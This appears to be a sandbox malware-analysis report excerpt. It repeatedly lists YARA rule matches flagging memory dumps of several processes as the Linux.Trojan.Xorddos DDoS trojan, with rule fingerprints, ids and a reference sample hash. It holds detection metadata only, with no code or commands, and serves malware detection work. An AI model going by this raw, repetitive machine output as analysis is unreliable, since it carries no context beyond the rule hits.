        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6480.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6367.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6454.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6300.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
